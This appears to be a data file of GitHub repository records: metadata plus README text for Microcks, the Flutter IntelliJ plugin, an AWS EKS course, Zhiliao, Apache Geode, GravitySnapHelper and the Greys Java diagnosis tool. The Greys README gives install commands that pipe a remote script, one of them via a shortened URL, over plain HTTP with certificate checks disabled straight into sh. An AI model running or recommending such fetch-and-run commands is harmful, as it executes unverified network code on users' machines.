[![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/microcks/microcks/build-verify.yml?logo=github&style=for-the-badge)](https://github.com/microcks/microcks/actions)
[![Container](https://img.shields.io/badge/dynamic/json?color=blueviolet&logo=docker&style=for-the-badge&label=Quay.io&query=tags[0].name&url=https://quay.io/api/v1/repository/microcks/microcks/tag/?limit=10&page=1&onlyActiveTags=true)](https://quay.io/repository/microcks/microcks?tab=tags)
[![Version](https://img.shields.io/maven-central/v/io.github.microcks/microcks?color=blue&style=for-the-badge)](https://search.maven.org/artifact/io.github.microcks/microcks)
[![License](https://img.shields.io/github/license/microcks/microcks?style=for-the-badge&logo=apache)](https://www.apache.org/licenses/LICENSE-2.0)
[![Project Chat](https://img.shields.io/badge/discord-microcks-pink.svg?color=7289da&style=for-the-badge&logo=discord)](https://microcks.io/discord-invite/)
# Microcks - Kubernetes native tool for API Mocking & Testing
Microcks is a platform for turning your API and microservices assets - *OpenAPI specs*, *AsyncAPI specs*, *gRPC protobuf*, *GraphQL schema*, *Postman collections*, *SoapUI projects* - into live mocks in seconds.
It also reuses these assets for running compliance and non-regression tests against your API implementation. We provide integrations with *Jenkins*, *GitHub Actions*, *Tekton* and many others through a simple CLI.
## Getting Started
* [Documentation](https://microcks.io/documentation/getting-started/)
To get involved with our community, please make sure you are familiar with the project's [Code of Conduct](./CODE_OF_CONDUCT.md).
## Build Status
The current development version is `1.9.1-SNAPSHOT`. [![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/microcks/microcks/build-verify.yml?branch=1.9.x&logo=github&style=for-the-badge)](https://github.com/microcks/microcks/actions)
#### Sonarcloud Quality metrics
[![Code Smells](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=code_smells)](https://sonarcloud.io/summary/new_code?id=microcks_microcks)
[![Reliability Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=reliability_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks)
[![Bugs](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=bugs)](https://sonarcloud.io/summary/new_code?id=microcks_microcks)
[![Coverage](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=coverage)](https://sonarcloud.io/summary/new_code?id=microcks_microcks)
[![Technical Debt](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=sqale_index)](https://sonarcloud.io/summary/new_code?id=microcks_microcks)
[![Security Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=security_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks)
[![Maintainability Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=sqale_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks)
## Versions
Here are the naming conventions we're using for current releases and ongoing development and maintenance activities.
| Status | Version | Branch | Container images tags |
| ----------- |------------------|----------|----------------------------------|
| Stable | `1.9.0` | `master` | `1.9.0`, `1.9.0-fix-2`, `latest` |
| Dev | `1.9.1-SNAPSHOT` | `1.9.x` | `nightly` |
| Maintenance | `1.8.2-SNAPSHOT` | `1.8.x` | `maintenance` |
## How to build Microcks
The build instructions are available in the [contribution guide](CONTRIBUTING.md).
## Thanks to community!
[![Stargazers repo roster for @microcks/microcks](http://reporoster.com/stars/microcks/microcks)](http://github.com/microcks/microcks/stargazers)
[![Forkers repo roster for @microcks/microcks](http://reporoster.com/forks/microcks/microcks)](http://github.com/microcks/microcks/network/members)
"
flutter/flutter-intellij,master,1945,308,2016-07-25T22:31:03Z,161597,692,Flutter Plugin for IntelliJ,flutter intellij-plugin java,"# Flutter Plugin for IntelliJ
[![Latest plugin version](https://img.shields.io/jetbrains/plugin/v/9212)](https://plugins.jetbrains.com/plugin/9212-flutter)
[![Build Status](https://travis-ci.org/flutter/flutter-intellij.svg)](https://travis-ci.org/flutter/flutter-intellij)
An IntelliJ plugin for [Flutter](https://flutter.dev/) development. Flutter is a multi-platform
app SDK to help developers and designers build modern apps for iOS, Android and the web.
## Documentation
- [flutter.dev](https://flutter.dev)
- [Installing Flutter](https://flutter.dev/docs/get-started/install)
- [Getting Started with IntelliJ](https://flutter.dev/docs/development/tools/ide)
## Fast development
Flutter's hot reload helps you quickly and easily experiment, build UIs, add features,
and fix bugs faster. Experience sub-second reload times, without losing state, on emulators,
simulators, and hardware for iOS and Android.
## Quick-start
A brief summary of the [getting started guide](https://flutter.dev/docs/development/tools/ide):
- install the [Flutter SDK](https://flutter.dev/docs/get-started/install)
- run `flutter doctor` from the command line to verify your installation
- ensure you have a supported IntelliJ development environment; either:
- the latest stable version of [IntelliJ](https://www.jetbrains.com/idea/download), Community or Ultimate Edition (EAP versions are not always supported)
- the latest stable version of [Android Studio](https://developer.android.com/studio) (note: Android Studio Canary versions are generally _not_ supported)
- open the plugin preferences
- `Preferences > Plugins` on macOS, `File > Settings > Plugins` on Linux, select ""Browse repositories…""
- search for and install the 'Flutter' plugin
- choose the option to restart IntelliJ
- configure the Flutter SDK setting
- `Preferences` on macOS, `File>Settings` on Linux, select `Languages & Frameworks > Flutter`, and set
the path to the root of your flutter repo
## Filing issues
Please use our [issue tracker](https://github.com/flutter/flutter-intellij/issues)
for Flutter IntelliJ issues.
- for more general Flutter issues, you should prefer to use the Flutter
[issue tracker](https://github.com/flutter/flutter/issues)
- for more Dart IntelliJ related issues, you can use JetBrains'
[YouTrack tracker](https://youtrack.jetbrains.com/issues?q=%23Dart%20%23Unresolved%20)
## Known issues
Please note the following known issues:
- [#601](https://github.com/flutter/flutter-intellij/issues/601): IntelliJ will
read the PATH variable just once on startup. Thus, if you change PATH later to
include the Flutter SDK path, this will not have an effect in IntelliJ until you
restart the IDE.
- If you require network access to go through proxy settings, you will need to set the
`https_proxy` variable in your environment as described in the
[pub docs](https://dart.dev/tools/pub/troubleshoot#pub-get-fails-from-behind-a-corporate-firewall).
(See also: [#2914](https://github.com/flutter/flutter-intellij/issues/2914).)
## Dev Channel
If you like getting new features as soon as they've been added to the code then you
might want to try out the dev channel. It is updated weekly with the latest contents
from the ""master"" branch. It has minimal testing. Set up instructions are in the wiki's
[dev channel page](https://github.com/flutter/flutter-intellij/wiki/Dev-Channel).
"
stacksimplify/aws-eks-kubernetes-masterclass,master,1220,5777,2020-04-20T11:41:14Z,52970,37,"AWS EKS Kubernetes - Masterclass | DevOps, Microservices",aws-alb aws-alb-ingress-controller aws-cloudwatch aws-codebuild aws-codecommit aws-codepipeline aws-ebs aws-eks aws-eks-cluster aws-fargate aws-rds docker fluentd kubernetes kubernetes-deployment kubernetes-pods kubernetes-secrets kubernetes-services yaml,"# AWS EKS - Elastic Kubernetes Service - Masterclass
[![Image](https://stacksimplify.com/course-images/AWS-EKS-Kubernetes-Masterclass-DevOps-Microservices-course.png ""AWS EKS Kubernetes - Masterclass"")](https://www.udemy.com/course/aws-eks-kubernetes-masterclass-devops-microservices/?referralCode=257C9AD5B5AF8D12D1E1)
## Course Modules
| S.No | AWS Service Name |
| ---- | ---------------- |
| 1. | Create AWS EKS Cluster using eksctl CLI |
| 2. | [Docker Fundamentals](https://github.com/stacksimplify/docker-fundamentals) |
| 3. | [Kubernetes Fundamentals](https://github.com/stacksimplify/kubernetes-fundamentals) |
| 4. | EKS Storage with AWS EBS CSI Driver |
| 5. | Kubernetes Important Concepts for Application Deployments |
| 5.1 | Kubernetes - Secrets |
| 5.2 | Kubernetes - Init Containers |
| 5.3 | Kubernetes - Liveness & Readiness Probes |
| 5.4 | Kubernetes - Requests & Limits |
| 5.5 | Kubernetes - Namespaces, Limit Range and Resource Quota |
| 6. | EKS Storage with AWS RDS MySQL Database |
| 7. | Load Balancing using CLB & NLB |
| 7.1 | Load Balancing using CLB - AWS Classic Load Balancer |
| 7.2 | Load Balancing using NLB - AWS Network Load Balancer |
| 8. | Load Balancing using ALB - AWS Application Load Balancer |
| 8.1 | ALB Ingress Controller - Install |
| 8.2 | ALB Ingress - Basics |
| 8.3 | ALB Ingress - Context path based routing |
| 8.4 | ALB Ingress - SSL |
| 8.5 | ALB Ingress - SSL Redirect HTTP to HTTPS |
| 8.6 | ALB Ingress - External DNS |
| 9. | Deploy Kubernetes workloads on AWS Fargate Serverless |
| 9.1 | AWS Fargate Profiles - Basic |
| 9.2 | AWS Fargate Profiles - Advanced using YAML |
| 10. | Build and Push Container to AWS ECR and use that in EKS |
| 11. | DevOps with AWS Developer Tools CodeCommit, CodeBuild and CodePipeline |
| 12. | Microservices Deployment on EKS - Service Discovery |
| 13. | Microservices Distributed Tracing using AWS X-Ray |
| 14. | Microservices Canary Deployments |
| 15. | EKS HPA - Horizontal Pod Autoscaler |
| 16. | EKS VPA - Vertical Pod Autoscaler |
| 17. | EKS CA - Cluster Autoscaler |
| 18. | EKS Monitoring using CloudWatch Agent & Fluentd - Container Insights |
## AWS Services Covered
| S.No | AWS Service Name |
| ---- | ---------------- |
| 1. | AWS EKS - Elastic Kubernetes Service |
| 2. | AWS EBS - Elastic Block Store |
| 3. | AWS RDS - Relational Database Service MySQL |
| 4. | AWS CLB - Classic Load Balancer |
| 5. | AWS NLB - Network Load Balancer |
| 6. | AWS ALB - Application Load Balancer |
| 7. | AWS Fargate - Serverless |
| 8. | AWS ECR - Elastic Container Registry |
| 9. | AWS Developer Tool - CodeCommit |
| 10. | AWS Developer Tool - CodeBuild |
| 11. | AWS Developer Tool - CodePipeline |
| 12. | AWS X-Ray |
| 13. | AWS CloudWatch - Container Insights |
| 14. | AWS CloudWatch - Log Groups & Log Insights |
| 15. | AWS CloudWatch - Alarms |
| 16. | AWS Route53 |
| 17. | AWS Certificate Manager |
| 18. | EKS CLI - eksctl |
## Kubernetes Concepts Covered
| S.No | Kubernetes Concept Name |
| ---- | ------------------- |
| 1. | Kubernetes Architecture |
| 2. | Pods |
| 3. | ReplicaSets |
| 4. | Deployments |
| 5. | Services - Node Port Service |
| 6. | Services - Cluster IP Service |
| 7. | Services - External Name Service |
| 8. | Services - Ingress Service |
| 9. | Services - Ingress SSL & SSL Redirect |
| 10. | Services - Ingress & External DNS |
| 11. | Imperative - with kubectl |
| 12. | Declarative - Declarative with YAML |
| 13. | Secrets |
| 14. | Init Containers |
| 15. | Liveness & Readiness Probes |
| 16. | Requests & Limits |
| 17. | Namespaces - Imperative |
| 18. | Namespaces - Limit Range |
| 19. | Namespaces - Resource Quota |
| 20. | Storage Classes |
| 21. | Persistent Volumes |
| 22. | Persistent Volume Claims |
| 23. | Services - Load Balancers |
| 24. | Annotations |
| 25. | Canary Deployments |
| 26. | HPA - Horizontal Pod Autoscaler |
| 27. | VPA - Vertical Pod Autoscaler |
| 28. | CA - Cluster Autoscaler |
| 29. | DaemonSets |
| 30. | DaemonSets - Fluentd for logs |
| 31. | Config Maps |
## List of Docker Images on Docker Hub
| Application Name | Docker Image Name |
| ----------------- | ----------------- |
| Simple Nginx V1 | stacksimplify/kubenginx:1.0.0 |
| Spring Boot Hello World API | stacksimplify/kube-helloworld:1.0.0 |
| Simple Nginx V2 | stacksimplify/kubenginx:2.0.0 |
| Simple Nginx V3 | stacksimplify/kubenginx:3.0.0 |
| Simple Nginx V4 | stacksimplify/kubenginx:4.0.0 |
| Backend Application | stacksimplify/kube-helloworld:1.0.0 |
| Frontend Application | stacksimplify/kube-frontend-nginx:1.0.0 |
| Kube Nginx App1 | stacksimplify/kube-nginxapp1:1.0.0 |
| Kube Nginx App2 | stacksimplify/kube-nginxapp2:1.0.0 |
| Kube Nginx App2 | stacksimplify/kube-nginxapp2:1.0.0 |
| User Management Microservice with MySQLDB | stacksimplify/kube-usermanagement-microservice:1.0.0 |
| User Management Microservice with H2 DB | stacksimplify/kube-usermanagement-microservice:2.0.0-H2DB |
| User Management Microservice with MySQL DB and AWS X-Ray | stacksimplify/kube-usermanagement-microservice:3.0.0-AWS-XRay-MySQLDB |
| User Management Microservice with H2 DB and AWS X-Ray | stacksimplify/kube-usermanagement-microservice:4.0.0-AWS-XRay-H2DB |
| Notification Microservice V1 | stacksimplify/kube-notifications-microservice:1.0.0 |
| Notification Microservice V2 | stacksimplify/kube-notifications-microservice:2.0.0 |
| Notification Microservice V1 with AWS X-Ray | stacksimplify/kube-notifications-microservice:3.0.0-AWS-XRay |
| Notification Microservice V2 with AWS X-Ray | stacksimplify/kube-notifications-microservice:4.0.0-AWS-XRay |
## List of Docker Images you build in AWS ECR
| Application Name | Docker Image Name |
| ----------------- | ----------------- |
| AWS Elastic Container Registry | YOUR-AWS-ACCOUNT-ID.dkr.ecr.us-east-1.amazonaws.com/aws-ecr-kubenginx:DATETIME-REPOID |
| DevOps Usecase | YOUR-AWS-ACCOUNT-ID.dkr.ecr.us-east-1.amazonaws.com/eks-devops-nginx:DATETIME-REPOID |
## Sample Applications
- User Management Microservice
- Notification Microservice
- Nginx Applications
## What will students learn in your course?
- You will write kubernetes manifests with confidence after going through live template writing sections
- You will learn 30+ kubernetes concepts and use 18 AWS Services in combination with EKS
- You will learn Kubernetes Fundamentals in both imperative and declarative approaches
- You will learn writing & deploying k8s manifests for storage concepts like storage classes, persistent volume claims (PVC), MySQL and the EBS CSI Driver
- You will learn to switch from native EBS Storage to RDS Database using k8s external name service
- You will learn writing and deploying load balancer k8s manifests for Classic and Network load balancers
- You will learn writing ingress k8s manifests by enabling features like context path based routing, SSL, SSL Redirect and External DNS.
- You will learn writing k8s manifests for advanced fargate profiles and do mixed mode workload deployments in both EC2 and Fargate Serverless
- You will learn using ECR - Elastic Container Registry in combination with EKS.
- You will implement DevOps concepts with AWS Code Services like CodeCommit, CodeBuild and CodePipeline
- You will implement microservices core concepts like Service Discovery, Distributed Tracing using X-Ray and Canary Deployments
- You will learn to enable Autoscaling features like HPA, VPA and Cluster Autoscaler
- You will learn to enable monitoring and logging for EKS cluster and workloads in cluster using CloudWatch Container Insights
- You will learn Docker fundamentals by implementing use cases like downloading an image from Docker Hub and running it on your local desktop, and building an image locally, testing it and pushing it to Docker Hub.
- You will slowly start by learning Docker fundamentals and move on to Kubernetes.
- You will master many kubectl commands over the process
## Are there any course requirements or prerequisites?
- You must have an AWS account to follow with me for hands-on activities.
- You don't need to have any basic Docker or Kubernetes knowledge to start this course.
## Who are your target students?
- AWS Architects or Sysadmins or Developers who are planning to master Elastic Kubernetes Service (EKS) for running applications on Kubernetes
- Any beginner who is interested in learning kubernetes on cloud using AWS EKS.
- Any beginner who is interested in learning Kubernetes DevOps and Microservices deployments on Kubernetes
## Each of my courses come with
- Amazing Hands-on Step By Step Learning Experiences
- Real Implementation Experience
- Friendly Support in the Q&A section
- 30 Day ""No Questions Asked"" Money Back Guarantee!
## My Other AWS Courses
- [Udemy Enroll](https://github.com/stacksimplify/udemy-enroll)
## Stack Simplify Udemy Profile
- [Udemy Profile](https://www.udemy.com/user/kalyan-reddy-9/)
# Azure Kubernetes Service with Azure DevOps and Terraform
[![Image](https://stacksimplify.com/course-images/azure-kubernetes-service-with-azure-devops-and-terraform.png ""Azure Kubernetes Service with Azure DevOps and Terraform"")](https://www.udemy.com/course/azure-kubernetes-service-with-azure-devops-and-terraform/?referralCode=2499BF7F5FAAA506ED42)
"
shatyuka/Zhiliao,master,2119,76,2020-11-09T07:17:35Z,201195,30,Zhihu ad-removal Xposed module,xposed zhihu zhiliao,"# Zhiliao (知了)
An Xposed module that removes ads from Zhihu
[![Chat](https://img.shields.io/badge/Telegram-Chat-blue.svg?logo=telegram)](https://t.me/joinchat/OibCWxbdCMkJ2fG8J1DpQQ)
[![Subscribe](https://img.shields.io/badge/Telegram-Subscribe-blue.svg?logo=telegram)](https://t.me/zhiliao)
[![Download](https://img.shields.io/github/v/release/shatyuka/Zhiliao?label=Download)](https://github.com/shatyuka/Zhiliao/releases/latest)
[![Stars](https://img.shields.io/github/stars/shatyuka/Zhiliao?label=Stars)](https://github.com/shatyuka/Zhiliao)
[![License](https://img.shields.io/github/license/shatyuka/Zhiliao?label=License)](https://choosealicense.com/licenses/gpl-3.0/)
## Features
- Ads
- Remove splash-screen ads
- Remove feed ads
- Remove answer-list ads
- Remove comment ads
- Remove share ads
- Remove ads at the bottom of answers
- Remove search ads
- Others
- Filter videos
- Filter articles
- Remove membership recommendations from the feed
- Remove circles from answers
- Remove product recommendations
- Remove related searches
- Remove keyword searches
- Open external links directly
- Prevent switching the color mode
- Show card categories
- Immersive status bar
- Prevent entering full-screen mode
- Unlock third-party login
- UI cleanup
- Remove the live button
- Hide red-dot badges
- Hide membership cards
- Hide trending notifications
- Simplify article pages
- Hide pinned trending items
- Hide mixed cards
- Navigation bar
- Hide the membership button
- Hide the video button
- Hide the follow button
- Hide the publish button
- Hide the discover button
- Disable event themes
- Hide the navigation bar bump
- Swipe gestures
- Swipe left/right to switch answers
- Remove the next-answer button
- Custom filtering
- Inject JS scripts
- Clean up temporary files
## Help
[Github Wiki](https://github.com/shatyuka/Zhiliao/wiki)
## Download
[Github Release](https://github.com/shatyuka/Zhiliao/releases/latest)
[Xposed Repo](https://repo.xposed.info/module/com.shatyuka.zhiliao)
[Lanzou Cloud](https://wwa.lanzoux.com/b00tscbwd) password: 1hax
## License
This project is licensed under the [GNU General Public Licence, version 3](https://choosealicense.com/licenses/gpl-3.0/).
"
apache/geode,develop,2267,681,2015-04-30T07:00:05Z,224880,22,Apache Geode,apache datagrid geode,"
## Contents
1. [Overview](#overview)
2. [How to Get Apache Geode](#obtaining)
3. [Main Concepts and Components](#concepts)
4. [Location of Directions for Building from Source](#building)
5. [Geode in 5 minutes](#started)
6. [Application Development](#development)
7. [Documentation](https://geode.apache.org/docs/)
8. [Wiki](https://cwiki.apache.org/confluence/display/GEODE/Index)
9. [How to Contribute](https://cwiki.apache.org/confluence/display/GEODE/How+to+Contribute)
10. [Export Control](#export)
## Overview
[Apache Geode](http://geode.apache.org/) is
a data management platform that provides real-time, consistent access to
data-intensive applications throughout widely distributed cloud architectures.
Apache Geode pools memory, CPU, network resources, and optionally local disk
across multiple processes to manage application objects and behavior. It uses
dynamic replication and data partitioning techniques to implement high
availability, improved performance, scalability, and fault tolerance. In
addition to being a distributed data container, Apache Geode is an in-memory
data management system that provides reliable asynchronous event notifications
and guaranteed message delivery.
Apache Geode is a mature, robust technology originally developed by GemStone
Systems. Commercially available as GemFire™, it was first deployed in the
financial sector as the transactional, low-latency data engine used in Wall
Street trading platforms. Today Apache Geode technology is used by hundreds of
enterprise customers for high-scale business applications that must meet low
latency and 24x7 availability requirements.
## How to Get Apache Geode
You can download Apache Geode from the
[website](https://geode.apache.org/releases/), run a Docker
[image](https://hub.docker.com/r/apachegeode/geode/), or install with
[Homebrew](https://formulae.brew.sh/formula/apache-geode) on OSX. Application developers
can load dependencies from [Maven
Central](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.apache.geode%22).
Maven
```xml
<dependencies>
  <dependency>
    <groupId>org.apache.geode</groupId>
    <artifactId>geode-core</artifactId>
    <version>$VERSION</version>
  </dependency>
</dependencies>
```
Gradle
```groovy
dependencies {
compile ""org.apache.geode:geode-core:$VERSION""
}
```
## Main Concepts and Components
_Caches_ are an abstraction that describe a node in an Apache Geode distributed
system.
Within each cache, you define data _regions_. Data regions are analogous to
tables in a relational database and manage data in a distributed fashion as
name/value pairs. A _replicated_ region stores identical copies of the data on
each cache member of a distributed system. A _partitioned_ region spreads the
data among cache members. After the system is configured, client applications
can access the distributed data in regions without knowledge of the underlying
system architecture. You can define listeners to receive notifications when
data has changed, and you can define expiration criteria to delete obsolete
data in a region.
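For illustration only, a listener in Java might look like the sketch below; it assumes Geode's `CacheListenerAdapter` convenience base class and `EntryEvent` callbacks, and would be registered on a region when the region is defined (for example through the region factory's `addCacheListener`):
```java
import org.apache.geode.cache.EntryEvent;
import org.apache.geode.cache.util.CacheListenerAdapter;

// Logs every entry that is created or updated in the region it is attached to.
public class LoggingListener extends CacheListenerAdapter<String, String> {
  @Override
  public void afterCreate(EntryEvent<String, String> event) {
    System.out.format(""created %s = %s%n"", event.getKey(), event.getNewValue());
  }

  @Override
  public void afterUpdate(EntryEvent<String, String> event) {
    System.out.format(""updated %s = %s%n"", event.getKey(), event.getNewValue());
  }
}
```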
_Locators_ provide clients with both discovery and server load balancing
services. Clients are configured with locator information, and the locators
maintain a dynamic list of member servers. The locators provide clients with
connection information to a server.
Apache Geode includes the following features:
* Combines redundancy, replication, and a ""shared nothing"" persistence
architecture to deliver fail-safe reliability and performance.
* Horizontally scalable to thousands of cache members, with multiple cache
topologies to meet different enterprise needs. The cache can be
distributed across multiple computers.
* Asynchronous and synchronous cache update propagation.
* Delta propagation distributes only the difference between old and new
versions of an object (delta) instead of the entire object, resulting in
significant distribution cost savings.
* Reliable asynchronous event notifications and guaranteed message delivery
through optimized, low latency distribution layer.
* Data awareness and real-time business intelligence. If data changes as
you retrieve it, you see the changes immediately.
* Integration with Spring Framework to speed and simplify the development
of scalable, transactional enterprise applications.
* JTA compliant transaction support.
* Cluster-wide configurations that can be persisted and exported to other
clusters.
* Remote cluster management through HTTP.
* REST APIs for REST-enabled application development.
* Rolling upgrades may be possible, but they will be subject to any
limitations imposed by new features.
## Building this Release from Source
See [BUILDING.md](./BUILDING.md) for
instructions on how to build the project.
## Running Tests
See [TESTING.md](./TESTING.md) for
instructions on how to run tests.
## Geode in 5 minutes
Geode requires installation of JDK version 1.8. After installing Apache Geode,
start a locator and server:
```console
$ gfsh
gfsh> start locator
gfsh> start server
```
Create a region:
```console
gfsh> create region --name=hello --type=REPLICATE
```
Write a client application (this example uses a [Gradle](https://gradle.org)
build script):
_build.gradle_
```groovy
apply plugin: 'java'
apply plugin: 'application'
mainClassName = 'HelloWorld'
repositories { mavenCentral() }
dependencies {
compile 'org.apache.geode:geode-core:1.4.0'
runtime 'org.slf4j:slf4j-log4j12:1.7.24'
}
```
_src/main/java/HelloWorld.java_
```java
import java.util.Map;
import org.apache.geode.cache.Region;
import org.apache.geode.cache.client.*;
public class HelloWorld {
  public static void main(String[] args) throws Exception {
    ClientCache cache = new ClientCacheFactory()
        .addPoolLocator(""localhost"", 10334)
        .create();
    Region<String, String> region = cache
        .<String, String>createClientRegionFactory(ClientRegionShortcut.CACHING_PROXY)
        .create(""hello"");

    region.put(""1"", ""Hello"");
    region.put(""2"", ""World"");

    for (Map.Entry<String, String> entry : region.entrySet()) {
      System.out.format(""key = %s, value = %s\n"", entry.getKey(), entry.getValue());
    }
    cache.close();
  }
}
```
Build and run the `HelloWorld` example:
```console
$ gradle run
```
The application will connect to the running cluster, create a local cache, put
some data in the cache, and print the cached data to the console:
```console
key = 1, value = Hello
key = 2, value = World
```
Finally, shutdown the Geode server and locator:
```console
gfsh> shutdown --include-locators=true
```
For more information see the [Geode
Examples](https://github.com/apache/geode-examples) repository or the
[documentation](https://geode.apache.org/docs/).
## Application Development
Apache Geode applications can be written in these client technologies:
* Java [client](https://geode.apache.org/docs/guide/18/topologies_and_comm/cs_configuration/chapter_overview.html)
or [peer](https://geode.apache.org/docs/guide/18/topologies_and_comm/p2p_configuration/chapter_overview.html)
* [REST](https://geode.apache.org/docs/guide/18/rest_apps/chapter_overview.html)
* [Memcached](https://cwiki.apache.org/confluence/display/GEODE/Moving+from+memcached+to+gemcached)
The following libraries are available external to the Apache Geode project:
* [Spring Data GemFire](https://projects.spring.io/spring-data-gemfire/)
* [Spring Cache](https://docs.spring.io/spring/docs/current/spring-framework-reference/html/cache.html)
* [Python](https://github.com/gemfire/py-gemfire-rest)
## Export Control
This distribution includes cryptographic software.
The country in which you currently reside may have restrictions
on the import, possession, use, and/or re-export to another country,
of encryption software. BEFORE using any encryption software,
please check your country's laws, regulations and policies
concerning the import, possession, or use, and re-export of
encryption software, to see if this is permitted.
See <http://www.wassenaar.org/> for more information.
The U.S. Government Department of Commerce, Bureau of Industry and Security (BIS),
has classified this software as Export Commodity Control Number (ECCN) 5D002.C.1,
which includes information security software using or performing
cryptographic functions with asymmetric algorithms.
The form and manner of this Apache Software Foundation distribution makes
it eligible for export under the License Exception
ENC Technology Software Unrestricted (TSU) exception
(see the BIS Export Administration Regulations, Section 740.13)
for both object code and source code.
The following provides more details on the included cryptographic software:
* Apache Geode is designed to be used with
[Java Secure Socket Extension](https://docs.oracle.com/javase/8/docs/technotes/guides/security/jsse/JSSERefGuide.html) (JSSE) and
[Java Cryptography Extension](https://docs.oracle.com/javase/8/docs/technotes/guides/security/crypto/CryptoSpec.html) (JCE).
The [JCE Unlimited Strength Jurisdiction Policy](https://www.oracle.com/technetwork/java/javase/downloads/jce8-download-2133166.html)
may need to be installed separately to use keystore passwords with 7 or more characters.
* Apache Geode links to and uses [OpenSSL](https://www.openssl.org/) ciphers.
"
rubensousa/GravitySnapHelper,master,4988,611,2016-08-31T07:25:23Z,83050,6,A SnapHelper that snaps a RecyclerView to an edge.,recyclerview snapping,"# GravitySnapHelper
A SnapHelper that snaps a RecyclerView to an edge.
## Setup
Add this to your build.gradle:
```groovy
implementation 'com.github.rubensousa:gravitysnaphelper:2.2.2'
```
## How to use
You can either create a GravitySnapHelper, or use GravitySnapRecyclerView.
If you want to use GravitySnapHelper directly,
you just need to create it and attach it to your RecyclerView:
```kotlin
val snapHelper = GravitySnapHelper(Gravity.START)
snapHelper.attachToRecyclerView(recyclerView)
```
If you want to use GravitySnapRecyclerView, you can use the following xml attributes for customisation:
```xml
```
Example:
```xml
```
## Start snapping
```kotlin
val snapHelper = GravitySnapHelper(Gravity.START)
snapHelper.attachToRecyclerView(recyclerView)
```
## Center snapping
```kotlin
val snapHelper = GravitySnapHelper(Gravity.CENTER)
snapHelper.attachToRecyclerView(recyclerView)
```
## Limiting fling distance
If you use **setMaxFlingSizeFraction** or **setMaxFlingDistance**
you can change the maximum fling distance allowed.
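For example, a quick sketch in Java (the setters are the ones listed under Features below; the values are just illustrative):
```java
GravitySnapHelper snapHelper = new GravitySnapHelper(Gravity.START);
// Let a single fling travel at most 1.5x the RecyclerView size...
snapHelper.setMaxFlingSizeFraction(1.5f);
// ...or cap it at an absolute distance in pixels instead:
// snapHelper.setMaxFlingDistance(1200);
snapHelper.attachToRecyclerView(recyclerView);
```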
## With decoration
## Features
1. **setMaxFlingDistance** or **setMaxFlingSizeFraction** - changes the max fling distance allowed.
2. **setScrollMsPerInch** - changes the scroll speed (see the sketch after this list).
3. **setGravity** - changes the gravity of the SnapHelper.
4. **setSnapToPadding** - enables snapping to padding (default is false)
5. **smoothScrollToPosition** and **scrollToPosition**
6. RTL support out of the box
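A rough Java sketch combining a few of these options (the values are illustrative and the exact parameter types may differ):
```java
GravitySnapHelper snapHelper = new GravitySnapHelper(Gravity.CENTER);
snapHelper.setScrollMsPerInch(100f);   // slow the snap scrolling down a little
snapHelper.setSnapToPadding(true);     // snap to the RecyclerView padding instead of its edge
snapHelper.attachToRecyclerView(recyclerView);
// Programmatic snapping to a given adapter position:
snapHelper.smoothScrollToPosition(10);
```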
## Nested RecyclerViews
Take a look at these blog posts if you're using nested RecyclerViews
1. [Improving scrolling behavior of nested RecyclerViews](https://rubensousa.com/2019/08/16/nested_recyclerview_part1/)
2. [Saving scroll state of nested RecyclerViews](https://rubensousa.com/2019/08/27/saving_scroll_state_of_nested_recyclerviews/)
## License
Copyright 2018 The Android Open Source Project
Copyright 2019 Rúben Sousa
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"
oldmanpushcart/greys-anatomy,master,3997,1216,2012-11-21T19:39:35Z,1769,75,Java诊断工具,diagnosis greys jvmti troubleshooting,"![LOGO icon](https://raw.githubusercontent.com/oldmanpushcart/images/master/greys/greys-logo-readme.png)
>
Why does the production system keep failing? Why does the database keep getting hit? Why do business calls fail again and again? Behind a chain of exception stack traces, which call is the real culprit?
What hides behind the unexpected avalanche of hundreds of servers: twisted software or fallen hardware?
Come and get to know Greys, a Java online problem-diagnosis tool.
# Documentation
* [About](https://github.com/oldmanpushcart/greys-anatomy/wiki/Home)
* [Installation](https://github.com/oldmanpushcart/greys-anatomy/wiki/installing)
* [Getting started](https://github.com/oldmanpushcart/greys-anatomy/wiki/Getting-Started)
* [FAQ](https://github.com/oldmanpushcart/greys-anatomy/wiki/FAQ)
* [Changelog](https://github.com/oldmanpushcart/greys-anatomy/wiki/Chronicle)
* [Full documentation](https://github.com/oldmanpushcart/greys-anatomy/wiki/greys-pdf)
* [English-README](https://github.com/oldmanpushcart/greys-anatomy/blob/master/Greys_en.md)
# Installation
- Remote install
```shell
curl -sLk http://ompc.oss.aliyuncs.com/greys/install.sh|sh
```
- Remote install (short URL)
```shell
curl -sLk http://t.cn/R2QbHFc|sh
```
## Latest version
### **VERSION :** 1.7.6.6
1. JDK 9 support
2. The greys.sh script now supports tar as an extraction mode (some machines do not have unzip); unzip remains the default
3. Fixed issue #219
### Version numbering
`major`.`large`.`small`.`bugfix`
* Major version
A fundamental upgrade of the program architecture. For example, from 0.1 to 1.0 the software moved from a single-machine design to a socket-based multi-machine design, and Greys' positioning was settled: a Java counterpart of HouseMD, but more capable than its predecessors.
* Large version
A significant redesign of the architecture that does not change how users position the software.
* Small version
New commands and features.
* Bug fix
Bug fixes and enhancements to the current version.
- No backward compatibility is promised across `major` or `large` versions; a `0.1` client is not guaranteed to work with a `1.0` server.
- Incompatible `small` versions are called out in the upgrade notes.
- `Bug fix` releases are guaranteed to be backward compatible.
# Maintainers
* [李夏驰](http://www.weibo.com/vlinux)
* [姜小逸又胖了](http://weibo.com/chengtd)
# Building from source
- Open a terminal
```shell
git clone git@github.com:oldmanpushcart/greys-anatomy.git
